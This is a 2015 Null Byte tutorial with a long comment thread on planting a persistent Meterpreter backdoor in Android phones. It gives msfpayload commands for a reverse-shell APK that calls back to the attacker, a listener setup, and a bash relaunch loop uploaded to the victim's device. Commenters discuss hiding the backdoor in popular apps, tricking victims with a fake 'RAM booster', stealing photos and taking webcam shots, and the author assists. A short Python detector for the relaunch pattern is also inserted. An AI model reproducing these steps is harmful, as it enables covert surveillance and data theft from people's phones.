12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo

HOW TO

Create a Persistent Back Door in Android Using Kali Linux:


BY F.E.A.R.  09/08/2015 4:25 PM ANDROID

OR rather How to make the Backdoor Persistent:

Hello, my Cold and Merciless Hackers,


Welcome to my 5th Post,

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.

I finally found a way to do this. As I was/am very poor at bash scripting, it took me a long time (approx. 20 hrs) to get the script working and executable,
thanks to the raw syntax I found on other sites.

Step 1

Fire Up Kali and Hack an Android System:


Use this guide to hack an android system on LAN.

I'll be hacking on WAN, using a VM.

Let's create a backdoor by typing:

msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

Now, let's set up a listener:


msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2

Create a Persistent Script:


Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)

--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)

Move/Copy this to the Home/Root folder of KALI.

--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3

Upload It to the Hacked Android System:


You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:

cd /

Now you should be in the ROOT directory, you can check by typing:

ls

Now type:

cd etc

Check again by typing:

ls

Again change directory:

cd init.d
ls

Here we are...

Time to Upload the Shell Script:


Do this by typing:

upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Let's just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:

cd /
cd /sdcard/Download
ls
upload anything.sh

Done! Uploaded!

Step 4

Execute the Script:
Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:

shell

Now, navigate to the location of the script:

cd /
cd /sdcard/Download
ls

Now it's time for EXECUTION. Type:

sh anything.sh

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)

Reboot to eliminate the script or use Task Killer

Step 5

Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!

PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.

(I know that the above picture shows that I am hacking on LAN instead of WAN, as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed it on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:
Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
Remember to reboot the android to eliminate the running script, if you are testing on your own Android System.
If the Victim's Android system is Rooted and your Public IP is Static, then:

1) The Persistence will remain forever on WAN!
2) The Persistence will remain forever on LAN Obviously

Good-Bye Hackers!

Keep Coming For More!

I'll be waiting for Your Likes and Comments,

Thank You,

F.E.A.R.
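
Seen from the device side, the loop in Step 2 leaves a regular trace: the same activity is started again at every sleep interval until the device reboots. The following is an added example, not part of the original post: a Python script that reads logcat text and flags any component launched at a near-constant interval. The log lines are constructed for illustration, and the function name, thresholds and the two benign package names are assumptions.

```python
"""Flag activities that logcat shows being relaunched at a fixed interval."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample, modelled on `logcat -v threadtime` output. Timestamps,
# PIDs, UIDs and the com.example.* package names are made up for illustration.
SAMPLE_LOGCAT = """\
09-08 16:25:01.120   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123 on display 0
09-08 16:25:10.004   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.example.browser/.Main} from uid 10021 on display 0
09-08 16:25:22.310   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123 on display 0
09-08 16:25:30.000   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Editor} from uid 10021 on display 0
09-08 16:25:31.250   812   845 W InputMethodManagerService: Window already focused, ignoring focus gain
09-08 16:25:43.480   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123 on display 0
09-08 16:25:50.000   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Editor} from uid 10021 on display 0
09-08 16:26:04.702   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123 on display 0
09-08 16:26:25.915   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123 on display 0
09-08 16:27:45.100   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.example.browser/.Main} from uid 10021 on display 0
09-08 16:28:00.000   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Editor} from uid 10021 on display 0
09-08 16:28:05.000   812  1401 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Editor} from uid 10021 on display 0
"""

# Activity-start records; newer Android releases log them under the
# ActivityTaskManager tag, so both tags are accepted.
START_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+\d+\s+\d+\s+[VDIWEF]\s+"
    r"Activity(?:Task)?Manager:\s+START u\d+ \{(?P<intent>[^}]*)\}"
)
CMP_RE = re.compile(r"\bcmp=(\S+)")


def parse_ts(ts):
    """threadtime stamps carry no year; pin a leap year so 02-29 parses."""
    return datetime.strptime("2000-" + ts, "%Y-%m-%d %H:%M:%S.%f")


def find_periodic_relaunch(logcat_text, min_launches=4, jitter_s=3.0):
    """Return components started >= min_launches times with near-equal gaps.

    A person opening an app produces irregular gaps; a `while ... sleep N`
    loop around `am start` produces gaps that differ by well under jitter_s.
    """
    launches = defaultdict(list)
    for line in logcat_text.splitlines():
        start = START_RE.match(line)
        if not start:
            continue  # not an activity-start record
        component = CMP_RE.search(start.group("intent"))
        if component:
            launches[component.group(1)].append(parse_ts(start.group("ts")))

    findings = []
    for component, times in launches.items():
        if len(times) < min_launches:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        spread = max(gaps) - min(gaps)
        if min(gaps) > 0 and spread <= jitter_s:
            findings.append({
                "component": component,
                "launches": len(times),
                "period_s": round(sum(gaps) / len(gaps), 1),
                "jitter_s": round(spread, 3),
            })
    return sorted(findings, key=lambda f: f["component"])


if __name__ == "__main__":
    for hit in find_periodic_relaunch(SAMPLE_LOGCAT):
        print("periodic relaunch: {component} x{launches}, "
              "every ~{period_s}s (jitter {jitter_s}s)".format(**hit))
```

On a test device the input would be the output of `adb logcat -d -v threadtime`; the measured period is the script's sleep value plus the time `am` itself takes to run.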

200 Comments

CIUFFY
2 YEARS AGO 1  

This is so easy to deploy with a little bit of Social Engineering, I gotta try this out.
I see you've been researching a lot to publish this, good job.

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Thank You! Ciuffy


Yes I had to do a lot of research to achieve it, with so many Fails.
But at last Success!

 REPLY

ANDREW VIGIL
6 MONTHS AGO -1 HIDDEN

SUDHARSAN VISWA
2 YEARS AGO 1  

Great post F.E.A.R. Is there a way I can embed the meterpreter back door in to an apk file (game,launcher,,etc) ???

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Thank You! Sudharsan,

While creating a payload, what we do is embed a trojan/meterpreter in an apk file, which is then known as backdoor/trapdoor.

In other words, it is already embedded into the apk file, while the time of creation.

 REPLY

SUDHARSAN VISWA
2 YEARS AGO 2  

Thank you for your response F.E.A.R. When the victim downloads the app, the app seems useless and the victim uninstalls the app.

If I can embed the backdoor in to a game or some other app, the backdoor will not be deleted. is there a way to embed the backdoor ?

 REPLY

F.E.A.R.
2 YEARS AGO 2

I don't think there is an easy way out for that, if you understand complicated ways follow this
Even if you do embed the code, you cannot make it persistent, because with the backdoor embedded, both, the app and the code will launch on the Android System
consistently.

Else, just try to convince the victim, that the app is meant to boost his Android, and it works in background. Show him/her the proof with a fake RAM scanner or a
normal RAM scanner application. (both would work)

 REPLY

RAPID
1 YEAR AGO 1  

did you find anyway of doing this? making it persistent on a original app?

 REPLY

MISTER INVISIBLE
10 MONTHS AGO - EDITED 10 MONTHS AGO 1  

Here: https://github.com/dana-at-cp/backdoor-apk/

Exactly what you wanted, but as F.E.A.R says, with persistence the app will open automatically and that wouldn't be stealthy. Although if you backdoor a popular app
like whatsapp and make the victim install it, they will use it without sensing the difference while you get your backdoor. ;)

 REPLY

MARK MATSON
2 YEARS AGO 1  

Dude thanks for this how to, but i have a problem with the script, when i execute the script remotely, its works, but send me many sessions of meterpreter, is so many
than i can't work is like an overflow of sessions. Do you know what happened? And thanks again for your work!

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Welcome! Mark,

Yes I know that there is an overflow of sessions even after terminating the shell, however the overflow should end when you get the meterpreter prompt. Maybe the
sleep command doesn't work, or try changing that to 2000 because the units maybe in milliseconds.

I'll try it too and update the script.

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Yes, found out a problem, Updating the script...Now...


The Units of the sleep command are in seconds.

 REPLY

MARK MATSON
2 YEARS AGO 1  

Thanks dude!! I'll try. And last thing, when I created the payload I had to put the LPORT line because it wasn't working for me.

msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 LPORT=4444 R > /root/abcde.apk

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Port 4444 is the default port, so I hadn't put it there.

 REPLY

MARK MATSON
2 YEARS AGO - EDITED 2 YEARS AGO 1  

My mistake, now is working fine!!!! I put all these commands in a single line.
Now is fixed....
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done

Thanks for your amazing job! Really i enjoy your how to!!

 REPLY

F.E.A.R.
2 YEARS AGO 1
Yes I know that, I already updated the script.
And You are Welcome! Mark (actually thanks to you!)

 REPLY

CRACKER|HACKER
2 YEARS AGO 1  

Absolutely amazing! Well done! It's always more fun to write your own scripts. I can't wait for more of your tutorials!

Just a suggestion: I wouldn't recommend putting your public IP out there, unless it is spoofed or hidden behind an anonymity service.

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Thank You! Cracker, (that means a LOT)


Actually those raw syntaxes helped me in writing it.

My Public IP is neither spoofed nor behind an anonymity service, however it's dynamic and my firewall has all ports closed, plus it tells me about any network
information which is received or sent by my System. (custom firewall)

And that's why I have to turn all of my Firewalls off while I hack.(except router's of-course)
Still, I appreciate the suggestion.

 REPLY

BACK DOOR
2 YEARS AGO 1  

Can we use NOIP for this?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Hi again Back,
Yes, you can (those are not my words, because I haven't tried it yet.)
But I am confident it will work!
There is a slight change in making the payload:

msfpayload android/meterpreter/reverse_tcp_dns LHOST=hostname.no-ip.com R > /root/abcde.apk

 REPLY

BACK DOOR
2 YEARS AGO 1  

Great i will try and let you know

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Darn it!
Sorry back, I tried, it only works on Windows,

msfpayload windows/meterpreter/reverse_tcp_dns LHOST=hostname.ddns.net X > /root/abcde.exe

 REPLY

RAFAEL OLIVEIRA
1 YEAR AGO 1  

How i use this in windows? Someone knows? I need to use this in NO-IP, but in kali isnt working.

 REPLY

SAM DARKZZ
1 YEAR AGO 1  

this payload is invalid!!


is there anyway to make sth like this?

 REPLY

H3X H3X
2 YEARS AGO 1  

Can I download the pictures on the android phone using kali? I mean get the pictures on that android user. Is it possible?

 REPLY

F.E.A.R.
2 YEARS AGO 1
Of-course!
Use download command

 REPLY

ZERBERO KHAN
2 YEARS AGO 1  

Hi, first thank you for this. I'm having trouble with the script, it keeps me sending the message: Error: Uknown option: --user. What could be? I already try without the "--user 0" option and it runs but does not do what have to do. Does this have to deal with the Android version? Any help would be appreciated.

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Hi and Welcome,
Really sorry about the (very) late reply, I actually missed this comment.
This is just an internal error, script is not wrong, tested on the Latest Android Version (5.0.2)
Reboot the android, or try it on another one.

 REPLY

JOSHUA DONCOUSE
2 YEARS AGO 1  

Wait though can't we make a autorunscript that after it connects to the phone it runs cd /
cd sdcard
cd DCIM
upload persistant.sh
shell
cd /
cd /sdcard/DCIM
ls
sh persistant.sh
in that order? just a thought.

 REPLY

CRACKER|HACKER
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Yes, you can. Just remember that if you are in a Meterpreter prompt, you will need to run the relative Meterpreter commands first.

 REPLY

F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 2  

I actually tried it, on the day I posted this, but same thing happened in my comment below.
So I told him to try it out first.

But then I found a mistake too, I made the script to run as soon as the session starts. (And this resulted in overflow, unknown cmds, etc)

But your method seems fine, I thought he needed a fully automatic script.
My mistake.
EDIT: Thank You C|H

 REPLY

CT9
6 MONTHS AGO 1  

Hi, I managed to create the autorunscript but can't get it to work completely:

to create it just edit a autorun.rc file in root folder of kali and enter your commands there (one per line) then in msf console run :

set AutoRunScript multiconsolecommand -rc /root/autorun.rc


and it will autorun all those commands when exploit connects.

However putting the commands you mentioned like this won't work because it will not run sh persistent.sh inside the shell, what happens is that it uploads the sh
file successfully, then open the shell, and run "sh persistent.sh" in background inside the meterpreter terminal and not the android shell, and I don't know how to fix
this.

We need to put some command inside the autorunscript to start the shell with a specific command (sh /sdcard/persistent.sh) but no idea how

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Good Idea!

But, I think first try it, because maybe, meterpreter may not be able to handle so many commands, so fast, and it will result in unknown command error, so it's better
to execute it step by step,
{As I said, maybe, that doesn't mean you shouldn't try it.}

 REPLY

JOSHUA DONCOUSE
2 YEARS AGO 1  

ok can anyone make an autorunscript file that does this? I can make say run autorunscript <scriptname> and it just stays there. pretty much here's what it does after i
connect the meterpreter

Session ID 1 (192.168.0.6:666 -> x.x.x.x:10067) processing AutoRunScript 'persist'


and nothing happens after that. my commands are what i commented earlier in a file called persist.

 REPLY

A.M
2 YEARS AGO 1  

Just a great & very easy to understand tutorial :)

I was just wondering about what would happen if two or more users installed&opened the apk !

Would you be able to control both of them at the same time ?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Thank You A.M,


If two or more users open the apk at the same time, two sessions will be created.
Yes, we can control them both at the same time (however one will remain in the background until we swap).

 REPLY

A.M
2 YEARS AGO 1  

Sorry for the late reply as I was busy with somethings ^^'

I'd like to know the command to 'swap' between devices please & also wanted to know if there's a problem that might occur when the (.sh file) is put more than once
on the same device... for example:

-once in the root area & once at any other place

 REPLY

CRACKER|HACKER
2 YEARS AGO 1  

If you are currently in a Meterpreter session, type background. Once you are back in the Metasploit command line, type sessions -i to view the sessions, and choose
by the session number, i.e. sessions -i 2.

 REPLY

A.M
2 YEARS AGO 1  

Thanks, Cracker|Hacker

I'll wait for F.E.A.R's answer on my second question &


there's also a problem that I'm having whenever I type the command 'shell' i get this error message :

" Error running command shell: Errno::EADDRNOTAVAIL Cannot assign requested address - bind(2) for "127.0.0.1" port 0 "
Any idea on how to fix it ?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Ans1: C|H answered perfectly!

Ans2: No there is no problem at all (your device should have root access to access the 'root area')

Ans3: Hm.. This error should not occur at this stage... "Address not available", the port is in use. Try changing the port and then exploit.

 REPLY

A.M
2 YEARS AGO 1  

Sorry for my ignorance but... How to change the port exactly ?


Cuz I searched for it but got no results that would help ^^'

 REPLY

F.E.A.R.
2 YEARS AGO 1

While creating the payload, just put this after LHOST:
LPORT 8080 (or 80, or try the default one again 4444)

Use the same port, while setting up a listener.

 REPLY

A.M
2 YEARS AGO 1  

Still same issue :(


Could this be related to that I'm using Kali on VirtualBox ?

 REPLY

CRACKER|HACKER
2 YEARS AGO 1  

Knowing how VirtualBox works for others, probably.

 REPLY

A.M
2 YEARS AGO 1  

Are there any solutions that I could try to fix this issue ?!
Cuz I can't install Kali outside the VirtualBox at the moment !
& Would installing another VM help ?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Virtual Box?
I have never used it and never will.
Only trust VMware (12 I think) I also like the way it allocates memory (RAM)
However the network settings are more complicated to configure but nevermind.
Also, I don't think this problem is because of virtual box but.. It's better to switch to VMware.
Try hacking another device, before switching.

 REPLY

A.M
2 YEARS AGO 1  

Getting this problem when I execute the ".sh" file on LAN:

'Error: Unknown option: --user'


then many things are written under it like options & such things !

any idea for the this ?

 REPLY

STEVEN DOT EXE


2 YEARS AGO 1  

meterpreter > cd init.d

stdapi_fs_chdir: Operation failed: 1

HELPPPPPPPPP
by the way, great tutorials, keep up the good work! :D

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Hi Steven,
Welcome to NullByte!
The device has to be rooted (have root access) to access that directory.
Thank You for the appreciation :)

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

what if target device is not rooted?

 REPLY

SHQIPERIA ETNIKE
2 YEARS AGO 1  

Where I write the code msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk the result is "Permission denied" how can I proceed

 REPLY

OCCUPYTHEWEB
2 YEARS AGO 1

you must be the root user.

 REPLY

SHQIPERIA ETNIKE
2 YEARS AGO 1  

How can I solve this problem

 REPLY

CRACKER|HACKER
2 YEARS AGO 1  

Use sudo as the command prefix.

 REPLY

OCCUPYTHEWEB
2 YEARS AGO 1  

Login as root.

 REPLY

PC 0MRADE
2 YEARS AGO - EDITED 2 YEARS AGO -1 HIDDEN

PC 0MRADE
2 YEARS AGO 1  

Android 5.x.x have been giving out the parsing error usually associated with unchecking the allow installation from unknown sources check box. This is
causing my two most common RATS to be impossible to install on devices. could it be that one like yourself has a solution.

 REPLY

JESSICA THOMSON
2 YEARS AGO - EDITED 2 YEARS AGO 1  

you need to sign your apk. /Here it tells how

 REPLY

CHAITANYAKUMAR G
2 YEARS AGO 1  

Hi, I just copied your bash script, in my rooted android 5.0.2 phone and when i execute it, it says, while unmatched. I tried adding ; after while and it gives different
error. Can someone please help ?

Chaitanya.

 REPLY

F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Yes, I know, on Lollipop it has issues.


I have tried about 20 such scripts after modifying, but no luck, still trying, it will take time (TIME)
EDIT: Will update the script when, found one working

 REPLY

CHAITANYAKUMAR G
2 YEARS AGO - EDITED 2 YEARS AGO 1  

I just tried with the am command line only then there is different message.. moreover i think with android 5, i am able to connect to the android device(non rooted),
but not able to execute any reboot or shutdown commands. It should say access/permission denied, but it says unknown command. :(

 REPLY

0XYG3N
2 YEARS AGO - EDITED 2 YEARS AGO 1  

hello ,

i've done exactly what you said.. its working i have meterpreter shell .. but its like restricted access.. i cant go to /system/etc/init.d or even upload the .sh file to
/sdcard/Download directory.. this is the error i get.

and i cant even delete something..


its like restricted permissions.

 REPLY

DONGWON LEE
2 YEARS AGO - EDITED 2 YEARS AGO 1  

i created the .apk file and exploit/multi/handler


but i can't run .apk file in my cell phone
what should i do??

-info-
cell phone is LG Gpro2 and android version 4.4.2
this is error message " There is a problem parsing the package"

 REPLY

0XYG3N
2 YEARS AGO -1 HIDDEN

DONGWON LEE
2 YEARS AGO - EDITED 2 YEARS AGO 1  

no... i can't install the .apk file....


if i run the .apk file in my phone " There is a problem parsing the package" error message

 REPLY

JESSICA THOMSON
2 YEARS AGO 2  

sign your apk just follow this

 REPLY

ITS HITMAN
2 YEARS AGO - EDITED 2 YEARS AGO 1  

hi there.!
how can i find the public ip of the android device connected to wifi, and i have no access to that device.
pls help me out.

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Google it using the default browser and android phone

 REPLY

ITS HITMAN
2 YEARS AGO 1  

i don't have any access to that android device, at that instance how can i?

 REPLY

HARSHA
2 YEARS AGO 1  

if target user has dynamic IP above method won't work.so any other way for dynamic ips?

 REPLY

KAMRAN BALOCH
2 YEARS AGO 1  

I need Help :( . when sends the file to cell . file can't open after downloading (Sorry bad in English) help me please Thanks

 REPLY

ASCHI33
2 YEARS AGO 1  

Hi,

I'm having the same problem as Suspéct.

I can perfectly navigate on the android filesystem, download images and stuff is also possible.

If i want to upload the script it produces an error like this:


- core-channel-open: Operation failed: 1

Is there a solution?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Upload it only to sdcard.


 REPLY

ASCHI33
2 YEARS AGO 1  

Thanks for the quick answer, sadly this produces the same error.

I tried to upload it to the sdcard, extsdcard and a few other places.

any idea what's going wrong?

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Recheck:
1) You have placed the script in the root folder of Kali
2) You have used the correct command:
3) upload xxx.sh

If this doesn't work then, it means your android is strict in security matters and hence you either have to root your android or try it on another one.

(Android exploitation is not in full support yet, it's quite unstable)

 REPLY

B7ITZZ
2 YEARS AGO 2  

The exploit doesn't seem to start up unless the user selects the MainActivity App again. Is there a way to run the app continuously in the background? I've tried the
suggested persistent back door but no luck.

 REPLY

TRYHARDER
2 YEARS AGO 1  

Image via imgur.com

This is the .apk

 REPLY

TRYHARDER
2 YEARS AGO 1  

If someone can reply me.. please do it :D


 REPLY

ENERGYWOLF
2 YEARS AGO - EDITED 2 YEARS AGO 1  

@tryharder I had the same problem. I solved it by manually signing the apk. This may work for you. Look at this link for how to sign the app manually

https://developer.android.com/tools/publishing/app-signing.html#signing-manually

Also, try installing adb with: apt-get install adb


And then install the apk with: adb install you_app.apk
(Note: your device must be connected to the computer for that to work, so nothing remote about that :p)

This step may not be necessary, but it's how I did it. So in case signing it doesn't work for you maybe try that last step too.

 REPLY

CASPERASS
2 YEARS AGO 1  

Thank you so much F.E.A.R. I have a question: How can we make it persistent decompiling it with apktool? What do we need to add to AndroidManifest.xml or smali?

Most of the victims' phone probably won't be rooted. So after reboot our malicious apk will be useless. If we add required lines to the source can we make it persistent
permanently?

 REPLY

ZACHARIAH HAZELWOOD
2 YEARS AGO 1  

Hey do you know if there is a command in meterpreter for android or a way to browse the sys files to get make and model of phone so i can change root

 REPLY

A.M
2 YEARS AGO 1  

Getting this problem when I execute the ".sh" file on LAN:

'Error: Unknown option: --user'


then many things are written under it like options & such things !

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Yeah, script is unstable in lollipop.

 REPLY

A.M
2 YEARS AGO 1  

my android version isn't lollipop!

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Sorry, missed your comment:


Then it should surely work.
Use other commands to run script: './anything.sh'

 REPLY

ARMAN BA
2 YEARS AGO 1  

Hi there!
I uploaded the script to 2 devices; one device was rooted but the other was not.
But when I run the script on both of them I get this error >>
: not found6: true
Where is the problem?


 REPLY
F.E.A.R.
2 YEARS AGO 1  

Yes I know,
Have been working on it for 3 weeks!
Found a solution, updating script...

 REPLY

ARMAN BA
2 YEARS AGO - EDITED 2 YEARS AGO 1  

thanks F.E.A.R

I found a solution and it works for me. I'll write and explain exactly what I did. When I copy and paste your script in Notepad it does not work for me, but when I write it like this it works.

(sorry for my bad English)

1. In Kali Linux open a terminal and write >> nano anything.sh << and then hit the Enter key on the keyboard. (This makes a new .sh file.)

2. In this window you must write your script code or copy and paste it. But I think it's better to write the code.

3. To save this script you must hit the Ctrl+X keys together on your keyboard, then hit the Y key, and after that hit the Enter key. (It's done, your file is saved.)

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Thank You for the comment,


But I already updated the script.
As for the way you explain how to write the script I agree. You can follow any method both will work.

GO THROUGH THE POST AGAIN AND READ THIS LINE:


CRITICAL: DO NOT...........WON'T WORK /!\

 REPLY

ANDRU SERBAN
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Hello people, which version of Kali do you use? Which is the last one with msfpayload? And working..?

FEAR, please tell me which is the last tutorial available for reverse_tcp on android? Only one session... to download some files...

Sorry for my bad English..

 REPLY

F.E.A.R.
2 YEARS AGO 2  

You can use any version of Kali,


If you get the msfpayload error, just use msfvenom.
It's here

 REPLY

PINKYFIRE
2 YEARS AGO 1  

Hello F.E.A.R
first i wanna thanks for all of ur great tut :)
i've got so many question,
1.are the LPORT is important ?? i dont see u typin' it when u make the backdoor.apk
2.Since we know our target android phone is not rooted,are we have to place the shell script in the download folder ??
3.can this method works in iphone ??

4.im already make my own payload.apk.on my rooted android its not work :( but work at my other android.what happen with that ??

5. After I set my listener and launch the Main Activity app on my other android (not rooted), the meterpreter starts working, which makes me happy for a while. I take some pics to try it with the (webcam_snap) command, it works as well, and then about 10 minutes later my meterpreter won't work with reason: Died. What happened??

Sorry for too many questions, and sorry for my bad English because English is not my main language :"(
Hope u reply all of my question
Thanks

 REPLY

F.E.A.R.
2 YEARS AGO 2

You are Welcome Rizky :)

1. My default LPORT is 4444 so there is no need to change it, until you are 'experimenting' over WAN, and have forwarded port other than 4444.

2. No don't do that, instead place it in a folder which is rarely explored or looked into. I did it as it is easily accessible from that folder.

3. Nope the method is for pure android systems.

4. Is the other phone in which the hack doesn't work is Mi ? It doesn't depend whether the android is rooted or not but it might depend on some systems.

5. Android meterpreter is very unstable, if you are getting 10min, you are really lucky. That is the reason why I made this persistence tutorial.

Follow it and you can have access to the android forever (provided the android doesn't reboot and you are on LAN)

No problem, I am always happy to help.

 REPLY

PINKYFIRE
2 YEARS AGO 1  

hey..thanks for reply me so fast i didnt expect that :)

im just want to say my rooted android phone use some cyanogen-rom i downloaded from the internet,maybe that makes me cant install the generated apk :/

and im still got some question,

1.the phone i try to hack is my own phone (for experiment) and its connected to my LAN,my question is,it is possible to hack someone android that not connected to my
LAN ??

2.if im make the sh script and then launch the script,what will happen when target reboot his phone ??
3.what happen when target delete the installed apk ??

Thanks for ur help,i dont even know you but im already like you :D
thanks for helping me :)

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Use a file manager/ explorer, navigate to the directory of the generated apk and install from there. (Make sure you have deleted the previously installed apk)

1. Yes you can test the hack on WAN (outside LAN), you need to fulfill two requirements:

a) the port (4444) used , should be forwarded (give me details about your router and I'll explain port forwarding)

b) while creating the payload you need to replace your internal IP with external/public one. (Type on Google: what's my IP)

2. If the non rooted target reboots the phone then the persistence will end. (The script will terminate)

3. If the target deletes the apk then all is lost (session will end)

 REPLY

PINKYFIRE
2 YEARS AGO - EDITED 2 YEARS AGO 1  

oops,my bad

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Don't reveal your Public IP, ever to anyone (Even if I do)


Also I just want a Company name and Model no. of the router:
For eg: Netgear Router DGN1000 etc.
OR
You can search here on your own.

If it is of Realtek, does the interface matches:


(I am assuming that you know how to login to the router config page...)

 REPLY

SAAD SAAB
2 YEARS AGO 1  

hello f.e.a.r
m new in kali linux, plz help me .... when i try to upload script.sh, it shows me an error:

core-channel-open: Operation failed: 1

& can u tell me how can i get root access..? as you've written above "We need Root Access to complete this command! Darn!"

sry 4 my bad English

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Hello Saad:

You don't need root access to execute the script, but to access the location you need root, so that the script is persistent even after reboot.

However if the device is not rooted, upload the script anywhere in sdcard, and follow the tutorial further. (The script will terminate after reboot :( )

 REPLY

SAAD SAAB
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Hey F.E.A.R, Thank u very much for reply

i am uploading the script in Downloads folder of android device, but the same error :( i am trying this script with galaxy s3, when i want to upload with this command
"upload script.sh" it gives me "core-channel-open: Operation failed: 1"

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Can you get me a screenshot please?

 REPLY

SAAD SAAB
2 YEARS AGO 1  

thanks again :)

 REPLY

F.E.A.R.
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Oops, missed the comment,


Follow:

cd /
upload script.sh
shell
cd /
sh script.sh

(Just upload it to root directory)


EDIT: If there is still an error, just type ls after cd / (in meterpreter) and a screenshot again.



 REPLY


SAAD SAAB
2 YEARS AGO 2

no prob bro thanks for your help :)

 REPLY

F.E.A.R.
2 YEARS AGO 2  

There should be no errors at this stage, because the ls cmd works.


Is the application (partially) blocked through the anti-virus?
This specific error indicates that the application has been denied to upload the script.
Try the following:

Try and use the download command (to download something), if this doesn't work then the application has been surely blocked by AV.
Try to remove/delete a file using rm command.
Finally try this with another android.

And tell the results.

 REPLY

SAAD SAAB
2 YEARS AGO 1  

i can download files from android device but can't upload.


oky i will try with another android device, thank you very much for your help & very nice tutorial :))

Image via fbcdn.net

 REPLY

TAREK ABD-ALLAH FARRAG


1 YEAR AGO - EDITED 1 YEAR AGO 1  

upload the script to the path you want in the phone


in your case this should be the following

upload root/script.sh /storage/emulated/legacy/Download

and go to the uploaded path and activate the shell

 REPLY

PINKYFIRE
2 YEARS AGO 1  

